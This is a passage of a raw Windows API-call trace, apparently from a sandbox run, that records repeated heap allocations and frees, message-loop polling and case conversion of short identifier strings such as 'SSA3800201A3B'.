Size=0x18) returned 0x2466e10 [0259.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.073] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0259.073] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.073] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0259.073] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.073] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.073] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0259.074] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0259.074] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0259.074] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.074] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0259.074] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.074] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0259.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0259.074] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.075] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0259.075] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.075] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.075] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0259.075] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.075] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.075] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0259.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0259.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0259.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0259.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0259.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0259.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0259.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0259.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0259.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0259.087] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0259.087] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0259.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0259.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0259.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0259.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0259.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0259.087] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0259.088] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.088] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0259.088] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.088] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0259.088] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.088] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0259.088] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0259.088] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0259.089] CryptDestroyKey (hKey=0xaa5920) returned 1 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0259.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0259.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0259.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0259.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0259.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0259.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0259.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0259.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0259.090] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0259.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0259.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0259.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0259.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0259.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0259.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.092] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0259.092] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0259.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.092] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0259.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0259.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0259.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0259.093] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0259.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0259.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0259.093] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.093] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0259.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0259.093] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.094] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.094] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0259.094] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.094] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 